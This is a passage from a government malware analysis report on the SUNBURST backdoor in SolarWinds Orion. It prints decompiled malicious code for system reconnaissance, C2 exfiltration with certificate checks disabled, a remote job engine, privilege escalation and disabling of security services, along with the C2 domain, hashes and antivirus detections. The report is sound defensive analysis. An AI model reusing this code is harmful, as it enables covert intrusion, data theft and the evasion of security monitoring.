OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\nEnvironment.UserName;\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\nOrionImprovementBusinessLayer.GetOSVersion(true);\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 11 of 30\n\nEnvironment.SystemDirectory;\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\n(object) (int) TimeSpan.FromMilliseconds((double) (uint)\r\nEnvironment.TickCount).TotalDays;\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + info\r\n+ \"\\n\";\r\nresult += 
OrionImprovementBusinessLayer.GetNetworkAdapterConfiguration();\r\n}\r\nThe GetNetworkAdapterConfiguration function will gather information on any attached network adapters and their\r\nconfiguration information.\r\nprivate static string GetNetworkAdapterConfiguration()\r\n{\r\nstring str = \"\";\r\ntry\r\n{\r\nusing (ManagementObjectSearcher managementObjectSearcher = new\r\nManagementObjectSearcher(OrionImprovementBusinessLayer.ZipHelper.Unzip(Select *\r\nFrom Win32_NetworkAdapterConfiguration where IPEnabled=true)))\r\n{\r\nforeach (ManagementObject managementObject in\r\nmanagementObjectSearcher.Get().Cast\u003cManagementObject\u003e())\r\n{\r\nstr += \"\\n\";\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(Description));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(MACAddress));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPEnabled));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPServer));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DNSHostName));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DNSDomainSuffixSearchOrder));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DNSServerSearchOrder));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(IPAddress));\r\nstr 
+=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(IPSubnet));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DefaultIPGateway));\r\n}\r\nreturn str;\r\n}\r\n}\r\ncatch (Exception ex)\r\n{\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 12 of 30\n\nreturn str + ex.Message;\r\n}\r\n**UPLOAD SYSTEM INFORMATION**\r\nThe “UploadSystemDescription” function is used to exfiltrate gathered system information. It parses through HTTP session\r\ninformation to form a full HTTP request that is sent to the remote C2 server. The modified version of the FNV-1a hash\r\nalgorithm is utilized to hash certain words associated with outbound HTTP requests, such as “accept” (Hash:\r\n2734787258623754862) and “content-type” (Hash: 6116246686670134098). It then parses through the provided HTTP\r\nsession data using these hash values, rather than HTTP strings, to obfuscate the functionality of this code. This obfuscation\r\nmakes it more difficult to manually or heuristically identify the functions intent to generate an outbound HTTP session.\r\n--Begin UploadSystemDescription Function--\r\npublic static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)\r\n    {\r\n       result = (string) null;\r\n       string requestUriString = args[0];\r\n       string s1 = args[1];\r\n       string s2 = args.Length \u0026gt;= 3 ? 
args[2] : (string) null;\r\n       string[] strArray = Encoding.UTF8.GetString(Convert.FromBase64String(s1)).Split(new string[3]\r\n       {\r\n        \"\\r\\n\",\r\n        \"\\r\",\r\n        \"\\n\"\r\n       }, StringSplitOptions.None);\r\n       HttpWebRequest httpWebRequest1 = (HttpWebRequest) WebRequest.Create(requestUriString);\r\n       HttpWebRequest httpWebRequest2 = httpWebRequest1;\r\n       httpWebRequest2.set_ServerCertificateValidationCallback(httpWebRequest2.get_ServerCertificateValidationCallback()\r\n+ (RemoteCertificateValidationCallback) ((sender, cert, chain, sslPolicyErrors) =\u0026gt; true));\r\n       httpWebRequest1.Proxy = proxy;\r\n       httpWebRequest1.Timeout = 120000;\r\n       httpWebRequest1.Method = strArray[0].Split(' ')[0];\r\n       foreach (string header in strArray)\r\n       {\r\n        int length = header.IndexOf(':');\r\n        if (length \u0026gt; 0)\r\n        {\r\n           string headerName = header.Substring(0, length);\r\n           string s3 = header.Substring(length + 1).TrimStart((char[]) Array.Empty\u0026lt;char\u0026gt;());\r\n           if (!WebHeaderCollection.IsRestricted(headerName))\r\n           {\r\n            httpWebRequest1.Headers.Add(header);\r\n           }\r\n           else\r\n           {\r\n            switch (OrionImprovementBusinessLayer.GetHash(headerName.ToLower()))\r\n            {\r\n               case 2734787258623754862:\r\n                httpWebRequest1.Accept = s3;\r\n                continue;\r\n               case 6116246686670134098:\r\n                httpWebRequest1.ContentType = s3;\r\n                continue;\r\n               case 7574774749059321801:\r\n                httpWebRequest1.UserAgent = s3;\r\n                continue;\r\n               case 8873858923435176895:\r\n                if (OrionImprovementBusinessLayer.GetHash(s3.ToLower()) == 1475579823244607677UL)\r\n                {\r\n                   httpWebRequest1.ServicePoint.Expect100Continue = 
true;\r\n                   continue;\r\n                }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 13 of 30\n\nhttpWebRequest1.Expect = s3;\r\n                continue;\r\n               case 9007106680104765185:\r\n                httpWebRequest1.Referer = s3;\r\n                continue;\r\n               case 11266044540366291518:\r\n                ulong hash = OrionImprovementBusinessLayer.GetHash(s3.ToLower());\r\n                httpWebRequest1.KeepAlive = hash == 13852439084267373191UL || httpWebRequest1.KeepAlive;\r\n                httpWebRequest1.KeepAlive = hash != 14226582801651130532UL \u0026amp;\u0026amp; httpWebRequest1.KeepAlive;\r\n                continue;\r\n               case 15514036435533858158:\r\n                httpWebRequest1.set_Date(DateTime.Parse(s3));\r\n                continue;\r\n               case 16066522799090129502:\r\n                httpWebRequest1.set_Date(DateTime.Parse(s3));\r\n                continue;\r\n               default:\r\n                continue;\r\n            }\r\n--End UploadSystemDescription Function--\r\nSUNBURST contains functions that give it the ability to run specified tasks, terminate processes, delete files, compute file\r\nhashes, and reboot the victim system.\r\n**RUN SPECIFIED TASKS**\r\nThe \"ExecuteEngine\" is a core function that uses the “job” variable to carry out certain tasks for the adversary. 
This function\r\nhas the ability to run tasks that could consist of command line arguments, alter the registry (to maintain persistence, etc.),\r\ncollect a detailed description of the target platform, kill tasks, delete files, add files, or even execute a secondary payload:\r\n--Begin ExecuteEngine Function--\r\nprivate int ExecuteEngine(\r\n       OrionImprovementBusinessLayer.HttpHelper.JobEngine job,\r\n       string cl,\r\n       out string result)\r\n    {\r\n       result = (string) null;\r\n       int num = 0;\r\n       string[] args = OrionImprovementBusinessLayer.Job.SplitString(cl);\r\n       try\r\n       {\r\n        if (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.ReadRegistryValue || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.SetRegistryValue || (job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteRegistryValue || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames))\r\n           num = OrionImprovementBusinessLayer.HttpHelper.AddRegistryExecutionEngine(job, args, out result);\r\n        switch (job)\r\n        {\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetTime:\r\n            int delay;\r\n            OrionImprovementBusinessLayer.Job.SetTime(args, out delay);\r\n            this.delay = delay;\r\n            break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.CollectSystemDescription:\r\n            OrionImprovementBusinessLayer.Job.CollectSystemDescription(this.proxy.ToString(), out result);\r\n            break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.UploadSystemDescription:\r\n            OrionImprovementBusinessLayer.Job.UploadSystemDescription(args, out result, this.proxy.GetWebProxy());\r\n            break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.RunTask:\r\n            num = OrionImprovementBusinessLayer.Job.RunTask(args, cl, out result);\r\n  
          break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetProcessByDescription:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 14 of 30\n\nOrionImprovementBusinessLayer.Job.GetProcessByDescription(args, out result);\r\n            break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.KillTask:\r\n            OrionImprovementBusinessLayer.Job.KillTask(args);\r\n            break;\r\n        }\r\n        return job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.WriteFile || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.FileExists || (job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteFile || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileHash) || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileSystemEntries ?\r\nOrionImprovementBusinessLayer.HttpHelper.AddFileExecutionEngine(job, args, out result) : num;\r\n       }\r\n       catch (Exception ex)\r\n       {\r\n        if (!string.IsNullOrEmpty(result))\r\n           result += \"\\n\";\r\n        result += ex.Message;\r\n        return ex.HResult;\r\n       }\r\n--End ExecuteEngine function--\r\n**TERMINATE PROCESSES**\r\n    public static void KillTask(string[] args) =\u0026gt;\r\nProcess.GetProcessById(int.Parse(args[0])).Kill();\r\n**DELETE FILE**\r\n    public static void DeleteFile(string[] args) =\u0026gt;\r\nSystem.IO.File.Delete(Environment.ExpandEnvironmentVariables(args[0]));\r\n**COMPUTE FILE HASHES**\r\n    public static int GetFileHash(string[] args, out string result)\r\n    {\r\n       result = (string) null;\r\n       string path = Environment.ExpandEnvironmentVariables(args[0]);\r\n       using (MD5 md5 = MD5.Create())\r\n       {\r\n        using (FileStream fileStream = System.IO.File.OpenRead(path))\r\n        {\r\n           byte[] hash = md5.ComputeHash((Stream) fileStream);\r\n           if (args.Length \u0026gt; 1)\r\n            return 
!(OrionImprovementBusinessLayer.ByteArrayToHexString(hash).ToLower() == args[1].ToLower()) ? 1 : 0;\r\n           result = OrionImprovementBusinessLayer.ByteArrayToHexString(hash);\r\n        }\r\n       }\r\n       return 0;\r\n    }\r\n**REBOOT SYSTEM**\r\npublic static bool RebootComputer()\r\n    {\r\n       bool flag = false;\r\n       try\r\n       {\r\n        bool previousState = false;\r\n        string privilege = OrionImprovementBusinessLayer.ZipHelper.Unzip(ph2eifo3n5utg1j8d94qrvbmk0sal76c);\r\n        if (!OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, true, out previousState))\r\n           return flag;\r\n        flag = OrionImprovementBusinessLayer.NativeMethods.InitiateSystemShutdownEx((string) null, (string) null, 0U,\r\ntrue, true, 2147745794U);\r\n        OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, previousState, out previousState);\r\n        return flag;\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 15 of 30\n\n}\r\n       catch (Exception ex)\r\n       {\r\n        return flag;\r\n       }\r\n    }\r\n--End additional functions Function--\r\n**ADJUST PROCESS PRIVILEGES**\r\nThe SetProcessPrivilege function is used to adjust privileges for a target process on the victim system. 
For example, a\r\nprocess may need increased system level privileges to accomplish its designed task.\r\n--Begin SetProcessPrivilege Function--\r\npublic static bool SetProcessPrivilege(\r\n       string privilege,\r\n       bool newState,\r\n       out bool previousState)\r\n    {\r\n       bool flag = false;\r\n       previousState = false;\r\n       try\r\n       {\r\n        IntPtr zero = IntPtr.Zero;\r\n        OrionImprovementBusinessLayer.NativeMethods.LUID Luid = new\r\nOrionImprovementBusinessLayer.NativeMethods.LUID();\r\n        Luid.LowPart = 0U;\r\n        Luid.HighPart = 0U;\r\n        if\r\n(!OrionImprovementBusinessLayer.NativeMethods.OpenProcessToken(OrionImprovementBusinessLayer.NativeMethods.GetCurrentProcess(),\r\nTokenAccessLevels.Query | TokenAccessLevels.AdjustPrivileges, ref zero))\r\n           return false;\r\n        if (!OrionImprovementBusinessLayer.NativeMethods.LookupPrivilegeValue((string) null, privilege, ref Luid))\r\n        {\r\n           OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);\r\n           return false;\r\n        }\r\n        OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE NewState = new\r\nOrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();\r\n        OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE PreviousState = new\r\nOrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();\r\n        NewState.PrivilegeCount = 1U;\r\n        NewState.Privilege.Luid = Luid;\r\n        NewState.Privilege.Attributes = newState ? 
2U : 0U;\r\n        uint ReturnLength = 0;\r\n        OrionImprovementBusinessLayer.NativeMethods.AdjustTokenPrivileges(zero, false, ref NewState, (uint)\r\nMarshal.SizeOf((object) PreviousState), ref PreviousState, ref ReturnLength);\r\n        previousState = (PreviousState.Privilege.Attributes \u0026amp; 2U) \u0026gt; 0U;\r\n        flag = true;\r\n        OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);\r\n        return flag;\r\n       }\r\n       catch (Exception ex)\r\n       {\r\n        return flag;\r\n       }\r\n    }\r\n    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n    private struct LUID\r\n    {\r\n       public uint LowPart;\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 16 of 30\n\npublic uint HighPart;\r\n    }\r\n    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n    private struct LUID_AND_ATTRIBUTES\r\n    {\r\n       public OrionImprovementBusinessLayer.NativeMethods.LUID Luid;\r\n       public uint Attributes;\r\n    }\r\n    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n    private struct TOKEN_PRIVILEGE\r\n    {\r\n       public uint PrivilegeCount;\r\n       public OrionImprovementBusinessLayer.NativeMethods.LUID_AND_ATTRIBUTES Privilege;\r\n    }\r\n   }\r\n--End SetProcessPrivilege Function--\r\n**BLOCK LIST CHECKING FUNCTIONS**\r\nThe Update function is critical to starting the SUNBURST C2 functionality. Early in its execution, the Update function calls\r\nthe UpdateNotification() function. If that returns a “False”, indicating one of the hard-coded block list processes is running,\r\nthe SUNBURST malware will not initiate its C2 session. The malicious class “OrionImprovementBusinessLayer”,\r\ncontaining the SUNBURST module, will effectively be disabled. 
However, the parent SolarWinds process running the\r\nmalicious DLL 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 will not be interrupted.\r\n--Begin Update Function--\r\n   private static void Update()\r\n   {\r\n    bool flag1 = false;\r\n    OrionImprovementBusinessLayer.CryptoHelper cryptoHelper = new\r\nOrionImprovementBusinessLayer.CryptoHelper(OrionImprovementBusinessLayer.userId,\r\nOrionImprovementBusinessLayer.domain4);\r\n    OrionImprovementBusinessLayer.HttpHelper http = (OrionImprovementBusinessLayer.HttpHelper) null;\r\n    Thread thread = (Thread) null;\r\n    bool last = true;\r\n    OrionImprovementBusinessLayer.AddressFamilyEx addressFamilyEx =\r\nOrionImprovementBusinessLayer.AddressFamilyEx.Unknown;\r\n    int num1 = 0;\r\n    bool flag2 = true;\r\n    OrionImprovementBusinessLayer.DnsRecords rec = new OrionImprovementBusinessLayer.DnsRecords();\r\n    Random random = new Random();\r\n    int num2 = 0;\r\n    if (!OrionImprovementBusinessLayer.UpdateNotification())\r\n       return;\r\n    OrionImprovementBusinessLayer.svcListModified2 = false;\r\n    for (int index = 1; index \u0026lt;= 3 \u0026amp;\u0026amp; !flag1; ++index)\r\n    {\r\n       OrionImprovementBusinessLayer.DelayMin(rec.A, rec.A);\r\n       if (!OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))\r\n       {\r\n        if (OrionImprovementBusinessLayer.svcListModified1)\r\n           flag2 = true;\r\n        num1 = OrionImprovementBusinessLayer.svcListModified2 ? 
num1 + 1 : 0;\r\n        string hostName;\r\n        switch (OrionImprovementBusinessLayer.status)\r\n        {\r\n           case OrionImprovementBusinessLayer.ReportStatus.New:\r\n            hostName = addressFamilyEx == OrionImprovementBusinessLayer.AddressFamilyEx.Error ?\r\ncryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out last);\r\n            break;\r\n           case OrionImprovementBusinessLayer.ReportStatus.Append:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 17 of 30\n\nhostName = flag2 ? cryptoHelper.GetNextStringEx(rec.dnssec) : cryptoHelper.GetNextString(rec.dnssec);\r\n            break;\r\n           default:\r\n            goto label_27;\r\n        }\r\n--End Update Function--\r\nThe UpdateNotification() function will return a \"False\" if any process on the hard coded blocklist is running on the target\r\nsystem. It utilizes the TrackProcess function detailed below. It call the TrackProcesses function.\r\n--Begin UpdateNotification Function--\r\nprivate static bool UpdateNotification()\r\n   {\r\n    int num = 3;\r\n    while (num-- \u0026gt; 0)\r\n    {\r\n       OrionImprovementBusinessLayer.DelayMin(0, 0);\r\n       if (OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))\r\n        return false;\r\n       if (OrionImprovementBusinessLayer.DnsHelper.CheckServerConnection(OrionImprovementBusinessLayer.apiHost))\r\n        return true;\r\n    }\r\n    return false;\r\n   }\r\n--End UpdateNotification Function--\r\nThe \"TrackProcesses\" function queries a list of running processes on the target system and then passes the process names to\r\nthe \"SearchAssemblies\" function, which hashes their process names and compares the result hashes to the hard-coded\r\nprocess hash list stored in the list \"assemblyTimeStamps.\" If any of the target processes are running, the function will return\r\nTrue. 
It also searches for certain services and attempts to disable them.\r\n--Begin TrackProcesses Function--\r\npublic static bool TrackProcesses(bool full)\r\n    {\r\n       Process[] processes = Process.GetProcesses();\r\n       if (OrionImprovementBusinessLayer.ProcessTracker.SearchAssemblies(processes))\r\n        return true;\r\n       bool flag = OrionImprovementBusinessLayer.ProcessTracker.SearchServices(processes);\r\n       return !flag \u0026amp; full ? OrionImprovementBusinessLayer.ProcessTracker.SearchConfigurations() : flag;\r\n    }\r\n--End TrackProcesses Function--\r\nThe \"SearchAssemblies\" function called by TrackProcesses, is used to enumerate running processes to determine if any of\r\nthe hashed processes, included within the process blocklist are currently running on the target system.\r\n--Begin SearchAssemblies Function—\r\nprivate static bool SearchAssemblies(Process[] processes)\r\n    {\r\n       for (int index = 0; index \u0026lt; processes.Length; ++index)\r\n       {\r\n        ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());\r\n        if (Array.IndexOf\u0026lt;ulong\u0026gt;(OrionImprovementBusinessLayer.assemblyTimeStamps, hash) != -1)\r\n           return true;\r\n       }\r\n       return false;\r\n    }\r\n--End SearchAssemblies Function--\r\nThe SearchServices\" function, called by TrackProcesses, searches running services to determine whether or not they are\r\nrunning any of the hard-coded block list target process hashes. 
It attempts to disable these services.\r\n--Begin SearchServices Function--\r\nprivate static bool SearchServices(Process[] processes)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 18 of 30\n\n{\r\n       for (int index = 0; index \u0026lt; processes.Length; ++index)\r\n       {\r\n        ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());\r\n        foreach (OrionImprovementBusinessLayer.ServiceConfiguration svc in OrionImprovementBusinessLayer.svcList)\r\n        {\r\n           if (Array.IndexOf\u0026lt;ulong\u0026gt;(svc.timeStamps, hash) != -1)\r\n           {\r\n            object obj = OrionImprovementBusinessLayer.ProcessTracker._lock;\r\n            bool flag = false;\r\n            try\r\n            {\r\n               Monitor.Enter(obj, ref flag);\r\n               if (!svc.running)\r\n               {\r\n                OrionImprovementBusinessLayer.svcListModified1 = true;\r\n                OrionImprovementBusinessLayer.svcListModified2 = true;\r\n                svc.running = true;\r\n               }\r\n               if (!svc.disabled)\r\n               {\r\n                if (!svc.stopped)\r\n                {\r\n                   if (svc.Svc.Length != 0)\r\n                   {\r\n                    OrionImprovementBusinessLayer.DelayMin(0, 0);\r\n                    OrionImprovementBusinessLayer.ProcessTracker.SetManualMode(svc.Svc);\r\n                    svc.disabled = true;\r\n                    svc.stopped = true;\r\n                   }\r\n                }\r\n               }\r\n            }\r\n            finally\r\n            {\r\n               if (flag)\r\n                Monitor.Exit(obj);\r\n            }\r\n--End SearchServices Function--\r\nScreenshots\r\nFigure 1 - The modified module with a new class function named \"OrionImprovementBusinessLayer.\"\r\nFigure 2 - The code snippet contains the subdomains and other strings used to construct the C2 
domains.\r\navsvmcloud.com\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain Name: avsvmcloud.com\r\nRegistry Domain ID: 2289718834_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.godaddy.com\r\nRegistrar URL: http://www.godaddy.com\r\nUpdated Date: 2020-10-08T13:58:35Z\r\nCreation Date: 2018-07-25T11:38:29Z\r\nRegistrar Registration Expiration Date: 2023-07-25T11:38:29Z\r\nRegistrar: GoDaddy.com, LLC\r\nRegistrar IANA ID: 146\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 19 of 30\n\nRegistrar Abuse Contact Email: abuse@godaddy.com\r\nRegistrar Abuse Contact Phone: +1.4806242505\r\nDomain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited\r\nDomain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited\r\nDomain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited\r\nDomain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited\r\nRegistry Registrant ID: Not Available From Registry\r\nRegistrant Name: Registration Private\r\nRegistrant Organization: Domains By Proxy, LLC\r\nRegistrant Street: DomainsByProxy.com\r\nRegistrant Street: 14455 N. Hayden Road\r\nRegistrant City: Scottsdale\r\nRegistrant State/Province: Arizona\r\nRegistrant Postal Code: 85260\r\nRegistrant Country: US\r\nRegistrant Phone: +1.4806242599\r\nRegistrant Phone Ext:\r\nRegistrant Fax: +1.4806242598\r\nRegistrant Fax Ext:\r\nRegistrant Email: avsvmcloud.com@domainsbyproxy.com\r\nRegistry Admin ID: Not Available From Registry\r\nAdmin Name: Registration Private\r\nAdmin Organization: Domains By Proxy, LLC\r\nAdmin Street: DomainsByProxy.com\r\nAdmin Street: 14455 N. 
Hayden Road\r\nAdmin City: Scottsdale\r\nAdmin State/Province: Arizona\r\nAdmin Postal Code: 85260\r\nAdmin Country: US\r\nAdmin Phone: +1.4806242599\r\nAdmin Phone Ext:\r\nAdmin Fax: +1.4806242598\r\nAdmin Fax Ext:\r\nAdmin Email: avsvmcloud.com@domainsbyproxy.com\r\nRegistry Tech ID: Not Available From Registry\r\nTech Name: Registration Private\r\nTech Organization: Domains By Proxy, LLC\r\nTech Street: DomainsByProxy.com\r\nTech Street: 14455 N. Hayden Road\r\nTech City: Scottsdale\r\nTech State/Province: Arizona\r\nTech Postal Code: 85260\r\nTech Country: US\r\nTech Phone: +1.4806242599\r\nTech Phone Ext:\r\nTech Fax: +1.4806242598\r\nTech Fax Ext:\r\nTech Email: avsvmcloud.com@domainsbyproxy.com\r\nName Server: PDNS09.DOMAINCONTROL.COM\r\nName Server: PDNS10.DOMAINCONTROL.COM\r\nDNSSEC: unsigned\r\nURL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/\r\n\u003e\u003e\u003e Last update of WHOIS database: 2020-12-14T19:00:00Z \u003c\u003c\u003c\r\nRelationships\r\navsvmcloud.com Connected_From 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nDescription\r\nThe subdomain for \"SolarWinds.Orion.Core.BusinessLayer.dll.\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 20 of 30\n\nd0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600\r\nTags\r\ndropper\r\nDetails\r\nName SolarWinds-Core-v2019.4.5220-Hotfix5.msp\r\nSize 214831104 bytes\r\nType\r\nComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Installation Database, Subje\r\nOrion Core Services 2019.4, Author: SolarWinds Worldwide, LLC., Keywords: Installer, Comments: This installer database contains th\r\nrequired to install SolarWinds Orion Core Services 2019.4., Create Time/Date: Tue Mar 24 11:55:04 2020, Name of Creating Applicatio\r\nInstaller XML Toolset (3.9.1208.0), Security: 4, Template: Intel;1033, Last Saved By: Intel;1033, Revision Number: 
{079A74C5-95D0\r\nB8EAF0A29654}119.4.20161.5220;{079A74C5-95D0-446E-86F7-B8EAF0A29654}119.4.20161.5220;{DA36F8E2-99FC-44DF-B01\r\n09F6B063B0F7}, Number of Pages: 200, Number of Characters: 152174623\r\nMD5 02af7cec58b9a5da1c542b5a32151ba1\r\nSHA1 1b476f58ca366b54f34d714ffce3fd73cc30db1a\r\nSHA256 d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600\r\nSHA512 f40fd5d94791f18eed59dc78d12acc52f4a65dfdf8c819d6957de8059e0e127160e0a21320845340932a54f9c639c42b2c815558b2d0cec11\r\nssdeep 3145728:yMbnCpAK7nuv7xYiq0bC4zheqeRHuCieBVZNP7WJOQeXt+9riYBaeIBjSxTusL:yMbCp7uf3GnqfCVrNPgLrW4GoxSG\r\nEntropy 7.998885\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\nd0d626deb3... Contains 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nDescription\r\nThis file is a Microsoft Windows Installer Patch file that has been identified as a SUNBURST installer named \"SolarWinds-Core-v2019.4.5220-Hotfix5.msp.\" This file contains legitimate SolarWinds Orion update components, the modified DLL\r\n\"SolarWinds.Orion.Core.BusinessLayer.dll\" (32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77)\r\nand a legitimate configuration file.\r\nThe hotfix is typically delivered to the SolarWinds Orion application as an update for the\r\n\"SolarWinds.Orion.Core.BusinessLayer.dll\" module. 
In this case, when the update is applied, it will overwrite the non-malicious module, replacing it with the trojanized version and providing the attacker with the same level of access as\r\ndescribed in the analysis of \"32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77.\"\r\nce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\r\nTags\r\nbackdoortrojan\r\nDetails\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 21 of 30\n\nName SolarWinds.Orion.Core.BusinessLayer.dll\r\nSize 1028072 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 846e27a652a5e1bfbd0ddd38a16dc865\r\nSHA1 d130bd75645c2433f88ac03e73395fba172ef676\r\nSHA256 ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\r\nSHA512 c26e275b4232be844f6c4062a4f42413099452085060ed4080b880b52800428cd32f69271c98977fa979a89355fbb3b485855ca3d51499bc\r\nssdeep 12288:5JKoHwfn/jz3bbO4Qag2I97PMieSLezPKT+BYvjenWHuhh9c0g8vkzK19Q:vEfDbO97P8TrK0YbenWH4c0g8vkzK19\r\nEntropy 5.580054\r\nAntivirus\r\nAhnlab Backdoor/Win32.SunBurst\r\nAntiy Trojan[Backdoor]/MSIL.Agent\r\nAvira TR/Sunburst.A\r\nBitDefender Trojan.Sunburst.A\r\nClamav Win.Countermeasure.Sunburst-9809152-0\r\nComodo Backdoor\r\nCyren W32/MSIL_SunBurst.A.gen!Eldorado\r\nESET a variant of MSIL/SunBurst.A trojan\r\nEmsisoft Trojan.Win32.Sunburst (A)\r\nIkarus Backdoor.Sunburst\r\nK7 Trojan ( 00574a531 )\r\nLavasoft Trojan.Sunburst.A\r\nMcAfee Trojan-sunburst\r\nMicrosoft Security Essentials Trojan:MSIL/Solorigate.BR!dha\r\nNANOAV Trojan.Win32.SunBurst.iduxyv\r\nSophos Mal/Sunburst-A\r\nSymantec Backdoor.Sunburst\r\nSystweak trojan-backdoor.sunburst-r\r\nTrendMicro Backdoo.6F8C6A1E\r\nTrendMicro House Call Backdoo.6F8C6A1E\r\nVirusBlokAda TScope.Trojan.MSIL\r\nZillya! 
